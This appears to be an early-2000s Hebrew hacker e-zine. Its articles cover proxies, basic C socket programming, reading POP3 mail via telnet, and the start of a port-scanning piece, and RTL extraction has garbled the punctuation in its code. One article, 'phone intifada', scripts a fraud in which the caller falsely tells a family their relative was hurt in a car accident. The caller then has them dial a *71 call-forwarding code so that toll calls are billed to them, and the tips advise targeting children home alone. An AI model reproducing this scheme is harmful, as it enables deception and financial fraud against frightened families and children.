‫כלומר‪ ,‬אחרי ‪ ,fuck‬הוא הגיע לשרת פרוקסי אשר היה צריך להתחבר למחשב יחיד‪ ,y ,‬בכדי להגיע‬
‫ליעד הסופי (‪ ,)b‬מה שקיצר את כל הדרך‪ .‬דמיינו את זה כאילו שבמקום ללכת את כל הסיבוב מהבית‬
‫ספר‬
‫למכולת של יהודה‪ ,‬אתם משתמשים בדרך קיצור וחותכים באמצע‪ .‬כמובן שלפעמים לשרת פרוקסי‬
‫יהיה חיבור מהיר יותר מאשר לשרתים אליהם תתחברו אם לא תשתמשו בו מה שייאץ את החיבור‬
‫עוד יותר‪.‬‬
‫אבל כמובן שזה לא חייב להיות ככה‪ .‬יכול להיות שחיבור דרך שרת הפרוקסי רק ייגרום לחיבורים‬
‫רבים יותר‬
‫ואיטיים יותר ובכך יאט את כל התהליך‪ .‬בשביל להבין את זה דמיינו שבמקום ללכת ישר לבית של‬
‫אלי‬
‫אתם צריכים עכשיו לעשות את כל הסיבוב כי קודם אתם צריכים לעבור דרך הבית של מיכל שהיא‬
‫בעצם‬
‫שרת הפרוקסי ובגללה הכל נהיה יותר ארוך ואיטי‪ .‬כוס אימא של מיכל‪ ,‬תראו מה היא עושה‪.‬‬
‫אסור לעבור דרך הבית שלה‪ .‬מיכל‪ ,‬תסתכלי למה את גורמת‪.‬‬
‫עכשיו בקשר לאנונימיות‪,‬‬

‫כשאתם מתחברים לאתר בדרך הרגילה‪" ,‬ישירות"‪ ,‬מספר האיי פי שלכם נקלט לשרת‪.‬‬
‫אבל כשאתם מתחברים דרך שרת הפרוקסי‪ ,‬מספר האיי פי של הפרוקסי נקלט במקום!!!‬
‫זה יכול להיות יעיל במקרים רבים ומרובים ואדומים וכחולים וגם צהובים אם בא לכם‪.‬‬
‫אבל מה זה איי פי?‬

‫כל פעם שאתם מתחברים לאינטרנט המחשב שלכם מקבל כתובת ‪.ip‬‬
‫‪ ip‬זה בעצם קיצור ל ‪ ,internet protocol‬אותו פרוטוקול שאחראי להעברת המידע‪.‬‬
‫אבל את זה אתם לא צריכים לדעת‪ .‬מה שכן‪ ,‬מספר איי פי או כתובת איי פי זה מעין‬
‫מספר זיהוי של המחשב שלכם‪ .‬בחיבור מודם רגיל‪ ,‬כל פעם שאתם מתחברים לאינטרנט כתובת‬
‫האיי פי שלכם תשתנה‪ .‬בכדי לבדוק מה כתובת האיי פי שלכם ברגע זה לחצו על תפריט ההתחל‪,‬‬
‫בחרו בהפעלה והקלידו‪winipcfg :‬‬
‫לחצו על מקש ה ‪ enter‬וחלון חדש יופיע‪.‬‬
‫הסתכלו בתיבה של ה ‪ .ip address‬יופיעו בה ארבעה מספרים מופרדים בנקודה‪.‬‬
‫אם אינכם מחוברים כרגע לאינטרנט‪ ,‬הכתובת תהיה ‪127.0.0.1‬‬
‫עכשיו‪ ,‬אחרי שקראתם את כל הזיבולים שלי על שרתי הפרוקסי‪ ,‬אתם בטח מתים להתחבר כבר‬
‫לאחד‪.‬‬
‫את האמת‪ ,‬אתם בטח מתים משעמום‪ ,‬וכבר לא בא לכם לקרוא את זה אבל מה עוד כבר יש לכם‬
‫לעשות עכשיו?‬
‫בכל מקרה‪ ,‬מאינטרנט אקספלורר (‪ ,)internet explorer‬בחרו את התפריט ‪ tools‬ובחרו‬

‫ב ‪ .internet options‬ייפתח לכם חלון חדש על המסך עם שישה תפריטים למעלה‪:‬‬
‫‪general, security, content, connections, programs, advanced‬‬
‫לחצו עם העכבר על תפריט ה ‪.connections‬‬
‫עכשיו חיפשו כפתור שכתוב עליו ‪settings...‬‬
‫לחצו על הכפתור‪.‬‬
‫חפשו איפה שכתוב את המילים ‪.proxy server‬‬
‫תדאגו שהתיבה מתחת שבה כתוב ‪ use a proxy server‬תהיה מסומנת‪.‬‬
‫אם היא לא מסומנת‪ ,‬סמנו אותה עכשיו‪ .‬כעת נשאר לכם רק למלא את שני תיבות הטקסט למטה‪.‬‬
‫התיבה הראשונה היא ‪ .address‬פה אתם כותבים את כתובת שרת הפרוקסי‪.‬‬
‫התיבה הבאה שלנו היא ‪ .port‬כאן אתם כותבים את מספר הפורט שבו שרת הפרוקסי פתוח‪.‬‬
‫זה בד"כ יהיה ‪ 8080‬או ‪ 8000‬אבל ממש ממש לאו דווקא‪.‬‬
‫אחרי שאתם ממלאים את שני התיבות האלה אתם פשוט לוחצים על כפתור ה ‪.ok‬‬
‫ושוב‪ ,‬לחצו עוד פעם על כפתור ה ‪.ok‬‬
‫אז איפה לעזאזל אתם מוצאים שרת פרוקסי? ואיך אתם יודעים באיזה פורט הוא פתוח?‬
‫ובכן‪ ,‬בד"כ לספק האינטרנט שלכם יהיה שרת פרוקסי‪ ,‬תשאלו אותם‪ .‬אני בטוח שהם ישמחו לעזור‪.‬‬
‫אם אתם משתמשים בבזק בינלאומי לדוגמא‪ ,‬שרת הפרוקסי הוא‪proxy.bezeqint.net :‬‬
‫ומספר הפורט הוא‪8080 :‬‬
‫חוץ מזה יש אלפי אתרים המפרסמים שרתי‬

‫פרוקסי הפתוחים לציבור הרחב‪ .‬שני אתרים כאלה הם‪:‬‬
‫‪http://proxys4all.cgi.net/public.shtml‬‬
‫‪http://tools.rosinstrument.com/cgi-bin/fp.pl/showlines?lines=200&sortor=3‬‬
‫וזהו‪ .‬אני יודע שיצא קצת חרא של כתבה אבל כתב אותה חרא של בנאדם (אם בכלל אפשר לקרוא לי‬
‫בנאדם)‪,‬‬
‫אז למה ציפיתם?‬
‫שלכם‪ ,‬של אימא שלי‪ ,‬של אבא שלי‪ ,‬של סבא שלי‪ ,‬של סבתא שלי‪ ,‬של אלוהים (שלא קיים)‪,‬‬
‫של המדינה‪ ,‬של השלטון‪ ,‬של העולם‪ ,‬של חברה שלי‪ ,‬וחברים שלי‪ ,‬וידידים שלי‪ ,‬וידידות שלי‪,‬‬
‫של המחשב שלי‪ ,‬ושל כל מה ששלי‪ ,‬וכל מה שלא שלי‪,‬‬
‫‪gehenom‬‬
‫התקשרויות מחשבים‪ :‬חלק ראשון‪:‬‬
‫איך לבנות סרבר‬
‫"שני דברים הם אינסופיים‪ :‬היקום והטמטום" (איינשטיין)‬

‫טוב אז ככה‪:‬‬
‫הכתבה הזאת לא מיועדת למתחילים או לאנשים רעים כמוכם שמשתמשים בנטבאס או בסאב ‪ 7‬או‬
‫בדברים דפוקים כאלה כדי להרגיש שהם "האקרים מגניבים"‪ .‬אז קודם כל‪ ,‬רק שתדעו ש"האקרים‬
‫מגניבים" כמעט ולא קיימים בגלל שאנשים כמוכם משתמשים בתוכנות‪ .‬בואו נהיה יותר חכמים‬
‫ובמקום להוריד אקספלוייט ‪ -‬נתכנת אותו‪.‬‬
‫אז למי המדריך הזה כן מיועד? קודם כל למי שלא הפסיק לקרוא פה‪  ..‬אני לא הולכת עכשיו ללמד‬
‫אתכם שפת ‪ c‬כי ככה‪ ,‬אבל אם יש לכם ידע בשפה‪ ,‬אפילו בסיסי‪ ,‬זה יכול להיות הבסיס לכתיבת‬
‫אקספלוייטים בעתיד‪.‬‬
‫היי‪ ,‬בבקשה אל תצפו ממני ליותר מדי כי מה שאני יודעת על הנושא כתבתי פה‪ .‬אז ככה שאני עוד לא‬
‫יכולה ללמד אתכם איך לבנות אקספלוייט‪ ,‬אבל‪ ,‬גם זה יבוא… ‪‬‬
‫יאללה לעניין‪:‬‬
‫זוכרים את מבנה ‪ 7‬השכבות של ‪ ?osi‬הבסיס של ‪ ?tcp/ip‬אם כן‪ ,‬אז מה שאנחנו הולכים לעשות עכשיו‬
‫זה ‪ low level programming‬שזה תכנות בשלוש רמות הנמוכות יותר‪ .‬איבדתם אותי? לא נורא‪ ,‬זה‬
‫לא כזה חשוב כרגע‪.‬‬
‫אז איך בעצם מחשבים מתקשרים ביניהם? דרך ‪.sockets‬‬
‫‪ socket‬זה מן "שקע" שדרכו עוברת אינפורמציה‪ .‬כל מה שאתם עושים באינטרנט‪ ,‬גורם לפתיחת‬
‫התקשרויות ‪ .sockets‬נניח שאתם כותבים בשורת הפקודה בדוס‪telnet 156.76.119.7 23 :‬‬
‫בעצם על האייפי המבוקש (במקרה הזה ‪ )156.76.119.7‬נמצאת מן תוכנה (‪ )daemon‬שמחכה‬
‫להתקשרות‪ .‬ברגע שמישהו מבקש להתחבר לאותו פורט (במקרה הזה ‪ )23‬תפקיד התוכנה הוא לאשר‬
‫לו את ההתקשרות ולהגיב על פקודות שהוא נותן‪.‬‬
‫מחשב שנמצא במצב "האזנה" (‪ )listening‬להתקשרויות נכנסות‪ ,‬נקרא "שרת" או ‪.server‬‬
‫המחשב שלכם‪ ,‬שבמקרה הזה שולח בקשה להתקשרות ופקודות לשרת נקרא "לקוח" או ‪.client‬‬
‫כל ההתקשרות שביניהם‪ ,‬מהרגע שהלקוח שולח בקשה להתחברות‪ ,‬ועד שהלקוח או השרת סוגר את‬
‫ההתקשרות נעשית דרך‪...‬‬
‫‪): !!sockets‬‬
‫בואו נכנס קצת יותר לעומק‪ .‬נניח שאני רוצה לבנות תוכנת שרת‪ ,‬איזה פקודות אני אצטרך? קודם כל‬
‫פקודות אתחול של ה‪ sockets‬שאני אכניס לתוכם הגדרות מסוימות‪ ,‬שתלויות באופן ההתקשרות‬
‫שלי‪ .‬נצטרך גם פונקציות אתחול של ‪ winsock‬אם אנחנו עובדים עם ‪.windows9x‬‬
‫זאת פקודת האתחול של הסוקטים בווינדוז‪:‬‬
‫;‪wsadata info‬‬
‫(‪if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫;(‪messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫עכשיו ניצור מופעים (ארגומנטים) של המבנה ‪ sockadrr_in‬שמכיל את הגדרות הסוקט‪:‬‬

‫;‪struct sockaddr_in my_addr, rmt_addr‬‬
‫המבנה נראה כך‪:‬‬
‫‪struct sockaddr_in‬‬
‫{‬
‫‪short int‬‬ ‫‪sin_family; /* address family‬‬ ‫‪*/‬‬
‫‪unsigned short int sin_port; /* port number‬‬ ‫‪*/‬‬
‫‪struct in_addr sin_addr; /* internet address‬‬ ‫‪*/‬‬
‫‪unsigned char sin_zero[8]; /* same size as struct sockaddr */‬‬
‫;}‬
‫‪struct in_adrr‬‬
‫{‬
‫;‪unsigned long s_addr‬‬
‫;}‬
‫בכל מקרה זה לא צריך לעניין אותנו‪ .‬מה שאנחנו צריכים לעשות זה פשוט ליצור מופעים של המבנה‬
‫שיכילו את ההגדרות‪.‬‬
‫נכניס אותן‪:‬‬
‫;‪my_addr.sin_family = af_inet‬‬
‫;(‪my_addr.sin_port = htons)myport‬‬
‫;‪my_addr.sin_addr.s_addr = inaddr_any‬‬
‫השורה הראשונה מודיעה לו שאנחנו רוצים לעבוד עם האינטרנט‪ .‬בשורה השניה אנחנו מכניסים לו‬
‫פורט (הפונקציה ‪ htons‬זה כדי לתרגם את הפורט לסדר שונה של ביטים‪ ,‬כמו שסוקטים אוהבים)‪.‬‬
‫בשורה השלישית אנחנו מכניסים אייפי‪ ,‬במקרה הזה זה הלוקאל (יענתו המחשב שלנו) שאנחנו נפתח‬
‫אח"כ להאזנה‪ inaddr_any .‬מוצא את הלוקאל אייפי‪ .‬אם נרצה להכניס אייפי אחר נצטרך להמיר את‬
‫הקידוד‪ ,‬ויש כמה פקודות שמטפלות באייפי ולכן אני סומכת עליכם שתקראו את המדריך באנגלית‪,‬‬
‫שם כתוב הכל‪.‬‬
‫נגדיר כמה סוקטים (זה טיפוס ‪ integer‬רגיל)‪:‬‬

‫;‪int socklstn, sockrcvd‬‬
‫;(‪socklstn = socket)af_inet,sock_stream,0‬‬
‫נצטרך כמובן להגדיר לו על איזה פורט אנחנו רוצים שהשרת "יאזין" (יחכה להתקשרויות)‪ ,‬אחרת‬
‫‪.‬הוא סתם ישב על איזה פורט רנדומלי‬
‫;((‪bind)socklstn,)struct sockaddr *(&my_addr, sizeof)struct sockaddr‬‬
‫‪ socklstn‬זה הסוקט המבוקש‪ struct sockaddr *(&my_addr( ,‬זאת המרה שצריך לעשות מהמבנה‬
‫של ‪ sockarr_in‬למבנה ‪ sockaddr‬שהיה לפניו‪ ,‬כי ‪ c‬לא מכירה במבנה ‪ .sockaddr_in‬הפרמטר‬
‫האחרון הוא הגודל של המבנה ‪.sockaddr‬‬
‫צריך גם להגיד כמה התקשרויות אנחנו רוצים שהשרת יאפשר‪ .‬לדוגמה‪ ,‬אפשר להגדיר שרק ‪ 4‬לקוחות‬
‫יוכלו לבקש להתחבר לשרת‪ .‬אח"כ השרת לא מתיר יותר התחברויות‪ .‬ברגע שלקוח מתנתק מהשרת‪,‬‬
‫הלקוח הבא יכול להתחבר‪)first in first out( .‬‬
‫טוב אז עכשיו הכל מוכן ואנחנו מאזינים לבקשות לקוחות‪ .‬אם אנחנו מוצאים אחת כזאת‪ ,‬נודיע‬
‫לשרת שיקבל את הבקשה‪.‬‬
‫;(‪listen)socklstn, backlog‬‬
‫‪ socklstn‬זה לאיזה סוקט הוא מאזין‪ ,‬ו ‪ backlog‬הוא מספר ההתקשרויות המותר‪.‬‬
‫התקבלה בקשה‪ .‬מה עושים אייתה?‬

‫;(‪sin_size = sizeof)struct sockaddr_in‬‬
‫;)‪sockrcvd = accept)socklstn, &rmt_addr, &sin_size‬‬
‫השורה הראשונה היא פשוט הגודל של המבנה ‪ sockaddr_in‬שהשורה השניה צריכה‪.‬‬

‫השורה השניה מקבלת את הבקשה שהתקבלה ב‪ socklstn. rmt_addr‬זה משתנה מסוג מצביע שיכיל‬
‫את הפרטים של הכתובת שמבקשת התחברות‪.‬‬
‫כל הבקשה הזאת נכנסת לתוך ‪ .sockrcvd‬מה שקורה בעצם‪ ,‬זה שהשרת מאזין על סוקט אחד (‬
‫‪ )socklstn‬אבל ברגע שיש בקשה הוא פותח סוקט אחר (‪ )sockrcvd‬כדי לקבל אותה‪ .‬כל מה שיועבר‬
‫ביניהם יעבור דרך ‪!!!sockrcvd‬‬
‫השרת ממשיך להאזין על ‪ !!!socklstn‬אם תבוא בקשה אחרת (תלוי כמה בקשות התרנו) הוא יפתח‬
‫סוקט אחר לאותה בקשה וכן הלאה‪.‬‬
‫זהו‪ ,‬מרגע שהשרת קיבל את הבקשה אפשר להתחיל להעביר אינפורמציה בין שניהם‪.‬‬
‫אם רוצים לסגור את הסוקטים‪ ,‬פשוט מאוד‪:‬‬

‫(‪shutdown)socklstn,3‬‬
‫או‪:‬‬
‫;(‪close)socklstn‬‬
‫חשוב לציין ‪ -‬כל הפקודות מחזירות ‪ 1-‬במקרה של שגיאה‪ ,‬ומפעילות את ‪.errno‬‬

‫זהו לבנתיים‪ .‬מאוד בקצרה‪ .‬כדאי מאוד לקרוא את המדריך באנגלית שמפרט את כל הפקודות‪.‬‬
‫‪zero cool, aka blood runner.‬‬
‫התקשרויות מחשבים‪ :‬חלק שני‪:‬‬
‫איך לבנות קליינט‬
‫“ ‪.”if man is one, and devil is six, then that must make me seven‬‬
‫(כתובת על שולחן בי"ס)‬
‫אהלןןןן לכם קוראים מתוקים ויקרים שלי‪ .‬או לפחות אלה ששרדו את החלק הקודם‪ .‬בואו נמשיך?‬
‫‪ ‬אז קודם כל‪ ,‬חדשוווות ‪ -‬אני שמחה לבשר לכם כי גם השנה ייערך כנס האקרים בישראל אבל יותר‬
‫צנוע משנה שעברה‪ ,‬כי שנה שעברה זה היה עולמי‪ ,‬נמשך ‪ 3‬ימים‪ ,‬והיו אתגרים כמו הרצאות באנגלית‬
‫במבטא עברי ואפילו גרמני וכל העסק עלה ‪ .60$‬בנות נכנסו בחינם היהיהיהיי תקנאו‪ .‬השנה זה יהיה‬
‫כנראה יום אחד‪ ,‬ישראלי ואפילו יותר נחמד‪ .‬בפעם הקודמת ההרצאות היו בלתי מובנות לחלוטין‬
‫ומשעממות‪ ,‬אבל היו אחלה חבר'ה‪ .‬השנה תוכלו לפגוש אותי! זה כבר סיבה טובה לבוא!!! אז כל‬
‫מעריציי‪ ,‬יאללה‪.‬‬
‫טוב‪ ,‬לעסק‪:‬‬
‫בחלק הקודם למדנו איך להאזין להתקשרויות‪ .‬בחלק הזה נלמד גם איך להתקשר למחשבים אחרים‪.‬‬
‫נניח שהסרבר מהפעם הקודמת מקשיב על פורט מסויים‪ .‬עכשיו בואו נתקשר לפורט הזה וננסה‬
‫לשלוח הודעה‪.‬‬
‫בוא נחשוב כמו בפעם הקודמת‪ ,‬מה יהיה תהליך העבודה שלנו?‬
‫דבר ראשון‪ ,‬לאתחל את ‪ winsock‬במקרה ואתם אנשים מסכנים כמוני שהלינוקס המסכן שלהם‬
‫מסרב להכיר במודם והעלים גם כונן של ‪ 2‬ג'יגה כי מרוב שהמשתמשת התלהבה היא שכחה להגדיר‬
‫אותו כמחיצת וינדוס‪.‬‬
‫פקודת האתחול‪ ,‬להזכירכם‪:‬‬
‫‪;wsadata info‬‬
‫‪)if )wsastartup)makeword)1,1(, &info( != 0‬‬
‫‪;)messagebox)null, "cannot initialize winsock!", "wsastartup", mb_ok‬‬
‫כמובן‪ ,‬נצטרך להגדיר מופעים של המבנה ‪ sockaddr_in‬וליצור טיפוס מסוג שלם בשביל הסוקט‪:‬‬
‫‪;int sockfd‬‬
‫‪;struct sockaddr_in dest_addr‬‬
‫;]‪char msg[81‬‬
‫‪ dest_addr‬יכיל את פרטי הכתובת שאנחנו רוצים להתחבר אליה‪.‬‬
‫הפרמטר האחרון הוא מערך‪ ,‬שיכיל את ההודעה שאנחנו רוצים לשלוח‪.‬‬
‫כמו בפעם הקודמת‪:‬‬

‫‪;)sockfd = socket)af_inet,sock_stream,0‬‬
‫‪;dest_addr.sin_family = af_inet‬‬
‫‪;)dest_addr.sin_port = htons)myport‬‬
‫‪;)dest_addr.sin_addr.s_addr = inet_addr)ip‬‬
‫שזה אומר שאתחלנו את הסוקט שישמש אותנו להתחברות‪ ,‬והכנסנו לתוכו הגדרות שאומרות שאנחנו‬
‫עובדים עם האינטרנט‪ .‬הוא ינסה להתחבר לפורט ‪ myport‬באייפי ‪.ip‬‬
‫הפקודה ‪ )inet_addr)ip‬נחוצה כי צריך להמיר את המספר ‪ ,ip‬לדוגמה‪ 207.23.45.666 :‬לסימון של‬
‫נקודות ומספרים (‪ )numbers-and-dots notation‬כי זה מה שהמחשב מבין‪.‬‬
‫ו‪-‬ע‪-‬כ‪-‬ש‪-‬י‪-‬ו גבירותיי ורבותיי‪ ,‬הרגע שכולכם חיכיתם לו…‬
‫‪;)connect)sockfd, )struct sockaddr *(&dest_addr, sizeof)struct sockaddr‬‬

‫מה זה אומר? התוכנית הנחמדה שלנו מנסה עכשיו להתחבר‪ .‬לצורך זה היא תשתמש ב‪ sockfd‬שזה‬
‫הסוקט שאיתו אנחנו עובדים‪ dest_addr .‬אמרנו כבר שיכיל את פרטי הסרבר (הכתובת אליה אנחנו‬
‫רוצים להתחבר) ו‪ sizeof‬כמו שאתם בטח יודעים‪ ,‬יחזיר פשוט את גודל המבנה ‪ .sockaddr‬ככה‬
‫הולכת הפקודה‪ ,‬היא צריכה גם את הגודל‪.‬‬
‫עכשיו בואו נשלח את ההודעה‪:‬‬
‫‪;)gets)msg‬‬
‫לקליטת הודעה מהמשתמש (מהמקלדת)‪.‬‬
‫‪;)send)sockfd,msg,strlen)msg(,0‬‬
‫הפקודה שולחת את ההודעה ‪ msg‬דרך הסוקט ‪ sockfd‬אל הכתובת שהגדרנו מקודם בהגדרות של‬
‫‪ sockfd )dest_addr(, strlen‬זה כמובן גודל ההודעה שהכרחי בעבודה עם סוקטים‪ ,‬וה ‪ 0 -‬המעצבן‬
‫פשוט צריך להיות שם‪.‬‬
‫לסגירת ההתקשרות‪ ,‬הפקודה שהכרנו כבר בחלק הקודם‪:‬‬
‫‪;)shutdown)sockfd,3‬‬
‫וזאת תורת הסוקטים בקצרה‪ .‬קל‪ ,‬נכון?‬
‫סיכום קצר כדי לעשות סדר בדברים‪:‬‬

‫למדנו איך לבנות תוכנית הנקראת סרבר‪ .‬כדי לבנות סרבר פתחנו ‪ socket‬להאזנה להודעות נכנסות‬
‫על פורט מסויים‪ .‬למדנו איך לבנות קליינט‪ ,‬שכדי לתקשר עם סרברים משתמש ב ‪ socket‬לשליחת‬
‫בקשות התקשרות לפורט מסויים‪ .‬אם הסרבר מאזין לפורט ‪ 23‬לדוגמה‪ ,‬והקליינט מבקש להתחבר‬
‫לפורט ‪ ,23‬הסרבר יקבל את הבקשה שלו ויפתח עבור ההתקשרות ‪ socket‬חדש‪ .‬דרך הסוקט הזה‬
‫הקליינט והסרבר שלנו ידברו ויקשקשו יחדיו עד שאחד הצדדים יסגור את ההתקשרות‪ .‬הקליינט יכול‬
‫לשלוח הודעה לסרבר והסרבר לקליינט‪ .‬לדוגמה‪ ,‬אם אנחנו על שרת דואר (פורט ‪ )25‬ואנחנו מקישים‪:‬‬
‫“‪ ”mail from: bill_gates@microsoft.com‬השרת יכול לבקש הזדהות קודם “‪polite people say‬‬
‫‪"helo first‬‬
‫ולסרב להגיב עד שנקיש לדוגמה‪. helo netvision.net.il ,‬‬
‫אם אתם עדיין מבולבלים קצת‪ ,‬במדריך הבא אני אתן תוכנית שלמה שמשחקת עם הקליינט והסרבר‬
‫ואנסה להסביר אותה‪ .‬אולי אפילו ננתח אקספלוייט אחד או שניים‪ .‬בקיצור‪ ,‬יש למה לחכות…‬
‫חשוב לציין ‪ -‬כל הפקודות מחזירות ‪ 1-‬במקרה של שגיאה‪ ,‬ומפעילות את ‪.errno‬‬
‫סיימתי את שלי להערב‪ .‬יאללה צ'או‪ .‬נתראה בקרוב‪ ,‬מבטיחה‪.‬‬
‫‪.zero cool, aka, blood runner‬‬
‫קריאת ‪ e-mail‬דרך טלנט‬
‫ש‪-‬ל‪-‬ו‪-‬ם חברים שלי!‬

‫מה המצב?‬
‫הכל אחלה? סבבה‪ .‬אצלי לא‪ .‬סתם‪ .‬אני במצב רוח מוזר ולכן אני אכתוב לכם מדריך מוזר על איך‬
‫לקרוא אימייל דרך טלנט‪ .‬וברקע יש לי גם דיסק מוזר ("‪ "bleach‬של נירוונה ‪ -‬נחמד‪ ..‬אבל לא יותר‬
‫מנחמד) ואני סתם מזבלת לכם את השכל אז יאללה לעבודה‪...‬‬
‫אז נכון שתמיד חשבתם שיש לכם "אימייל נייד" כמו הוטמייל‪ ,‬אימייל‪.‬קום וכו' ו"אימייל של הבית"‬
‫שכשאתם מתחברים מהבית אתם פותחים אותו דרך אאוטלוק אקספרס וכו'? אז יופי‪ .‬אבל ידעתם‬
‫שאפשר לפתוח אותו לא רק מהבית? בטח שידעתם! אבל ידעתם גם איך לעשות את זה? נו בשביל מה‬
‫אני פה???? ‪):‬‬
‫טוב תפתחו את טלנט (‪ )telnet‬ותתחברו לפורט ‪ 110‬אל השרת אימייל נכנס של הספק שלכם‪ .‬אם אתם‬
‫לא יודעים את הכתובת‪ ,‬תתקשרו לספק ותשאלו‪ .‬אם יש לכם את הדפים ששלחו לכם כשעשיתם מנוי‬
‫אינטרנט‪ ,‬צריך להיות כתוב שם בתצורה של איך לסדר את התיבת אימייל‪ .‬אני לדוגמה על אינטרנט‬
‫זהב‪ ,‬אז ב ‪ hostname‬אני כותבת‪:‬‬
‫‪in.inter.net.il‬‬
‫שזה השרת לאימייל נכנס שלהם‪ .‬אגב‪ ,‬השרת לאימייל יוצא הוא‪ ,‬כמה מפתיע‬
‫‪out.inter.net.il‬‬
‫פורט ‪ 110‬זה הפורט לאימייל נכנס‪.‬‬

‫אוקי‪ ..‬התחברנו‪ .‬מה עכשיו? טוב‪ ,‬זאת היתה הבעיה שלי במשך כמה שנים כי פשוט אין שם את‬
‫הפקודה‬
‫‪ help‬או ? או ‪man‬‬
‫כדי לתת רשימת פקודות!!! ותנסו בעצמכם לחפש באלטה‪-‬ויסטה ולא תמצאו כלום‪ .‬אז למזלי פגשתי‬
‫מישהו שידע את הפקודות והנה הן‪:‬‬
‫‪user username‬‬
‫תכניסו במקום ‪ username‬את שם המשתמש שלכם‬
‫‪pass password‬‬
‫תכניסו במקום ‪ password‬את הסיסמת התחברות שלכם‪.‬‬
‫עכשיו בחלק מהשרתים הוא ישר ייתן לכם רשימה של אימיילים שקיבלתם זה יראה ככה‪:‬‬
‫‪5736 1‬‬
‫‪57362 2‬‬
‫‪3822 3‬‬
‫זה אומר שיש לכם ‪ 3‬אימיילים חדשים‪ .‬כדי לקרוא אותם‪ ,‬רשמו‬
‫‪retr 1‬‬
‫כדי לקרוא את הראשונה‬
‫‪retr 2‬‬
‫כדי לקרוא את השניה וכו'‪.‬‬
‫השרת של אינטרנט זהב לדוגמה‪ ,‬אחרי שאתם מקישים שם משתמש וסיסמה ייתן לכם הודעה כזאת‪:‬‬
‫‪mail list drop and ready‬‬
‫ותצטרכו להקליד‬
‫‪list‬‬
‫כדי לראות את רשימת ההודעות‪ .‬אם אין לכם אימיילים חדשים השרת ייתן את ההודעה‬
‫‪scan list follows‬‬
‫‪.‬‬
‫טוב‪ .‬אם האימייל עובר מהר מדי ואתם לא מצליחים לקרוא אותו‪ ,‬פשוט תבחרו בתפריט‬
‫‪terminal> start logging‬‬
‫ותבחרו קובץ שאליו הוא יכתוב‪ .‬אח"כ לכו לקובץ ותקראו משם‪.‬‬
‫אם אתם רוצים למחוק הודעות‪,‬‬

‫‪dele 1‬‬
‫‪dele 2‬‬
‫וכדומה‪.‬‬
‫סיימתם עם האימיילים? סגרו בעזרת‬

‫‪quit‬‬
‫טוב‪ ,‬לכתוב אימיילים דרך פורט ‪ 25‬אתם יודעים כבר כי זה גיהנום לימד אתכם‪.‬‬
‫אם אתם רוצים ללמוד עוד על טלנט ופורטים שימושיים‪ ,‬לכו ל‬
‫‪www.happyhacker.org‬‬
‫אתר מומלץ ביותר! חפשו את ה‬
‫‪.guides to mostly harmless hacking‬‬
‫אבל מה שהסברתי פה אני לא מצאתי באף מקום‪ .‬אז תרגישו מיוחדים‪...‬‬

‫ביי לכם מתוקנים שלי ותרגישו טוב‬
‫"‪"all tied up and dried up forever, all fucked up and dead to the world‬‬
‫‪): the coolest zero on earth‬‬

‫או‬
‫‪blood runner‬‬
‫בשבילכם‪.‬‬
‫אינטיפדאת טלפונים‬
‫לפני כמה זמן ראיתי (נראה לי בפורום של ‪ ) ihc‬הודעה כזאתי‪:‬‬
‫אינטיפדאת טלפונים‬
‫שמעתי שיש אנשים שמתקשרים למספר טלפון מבקשים ממי שמרים את השפופרת לחייג‬
‫קוד מספרי מסויים ואחרי זה הם עושים שיחות על חשבונו‪.‬‬
‫מישהו יודע מהו הקוד ואיך משתמשים בו ?‬
‫אז ישבתי וחשבתי קצת ובסוף עליתי על זה‪ .‬הטריק לא ייתן לך לעשות שיחות לגמרי‬
‫בחינם אלא ייתן לך לעשות שיחות חוץ במחיר של שיחות מקומיות‪.‬‬
‫כל העניין מבוסס על שימוש ב ‪( *71‬עקוב אחרי)‬

‫אז קודם כל נצטרך להבין איך בזק מחייבת על השרות‪.‬‬
‫נגיד שאני גר בבית א ועשיתי עקוב אחרי לבית ב ‪ .‬בנדם מטלפון ג מתקשר‬
‫אלי ‪ ,‬את התשלום על השיחה מ ג לבית שלי ( א ) המתקשר ישלם אבל על המשך‬
‫השיחה מהבית שלי למקום שעשיתי אליו עקוב אחרי אני משלם‪.‬‬
‫ועכשיו לקטע המעשי בואו נאמר שאני באזור ‪ 04‬ורוצה להתקשר‬

‫למספר טלפון הזה ‪ 029765432 -‬אני פותח ספר טלפנים ורואה את הדבר הבא‪:‬‬
‫ירון וחנה לוי ………………………………… ‪0481234567‬‬
‫אז אני יחייג ‪ 81234567‬והשיחה תלך בערך ככה‪:‬‬
‫אני‪ :‬שלום אני מדבר עם משפחתו של ירון לוי?‬

‫האדיוט שענה לי ‪ :‬כן‬
‫אני‪ :‬שלום ‪ ,‬מדברים מבית החולים רמב"ם ירון נפגע בתאונת דרכים‬
‫אם אתם רוצים לדבר עם הרופא עליכם לחייג ‪. *71029765432‬‬
‫האידיוט שענה לי ‪ :‬טוב אני עכשיו מתקשר‬
‫אני ‪ :‬תודה ולהתראות‪.‬‬
‫******************************************************‬
‫טיפ‪ :‬אם השגתם איזה שהו עותק של רשומון‬
‫תוכלו להוסיף עוד פרטים כדי שהעניין יהיה יותר משכנע‬
‫******************************************************‬
‫*********************************************************‬
‫עוד טיפ ‪ :‬רק ילדים קטנים יהיו מספיק טיפשים‬
‫להאמין לכם אז תתקשרו בשעות שהורים לא אמורים להיות בבית‬
‫*********************************************************‬
‫עכשיו אחרי שעשית את כל העניין המשעמם הזה אתה יכול‬
‫להתקשר פשוט ל ‪ 81234567‬ואז אתה תופנה אוטומטית ל ‪. 029765432‬‬
‫הערה ‪ :‬לא היה לי לב לבדוק אם זה עושה שיחות לחו"ל אתם מוזמנים לנסות‪.‬‬
‫הכתבה נכתבה ע"י ‪y0g1 b3ar‬‬

‫פורט סקנינג‬
‫‪++++++++++++++++++++++++++++++++++++++++++++++++++++++‬‬
‫‪(in loving memory of douglas adams (1952-2001‬‬
‫‪++++++++++++++++++++++++++++++++++++++++++++++++++++++‬‬
‫לכל אלה מכם ששואלים "מי זה לעזאזל דאגלאס אדאמס" אולי‬

‫"מדריך הטרמפיסט לגלקסיה" יזכיר לכם משהו‪ .‬ואם לא אז תתביישו‪ ,‬תתביישו‪,‬‬
‫תתביישו כי זה הדבר הכי מופרע‪ ,‬מצחיק‪ ,‬מגניב‪ ,‬מדליק‪ ,‬הכל שקיים בעולם‪,‬‬
‫ביקום ובכל השאר‪..‬‬
‫לא חשוב‪ .‬ראיתי כבר אנשים שהקדישו לאהובותיהם אקספלוייטים‪ ,‬מתמטיקאים‬
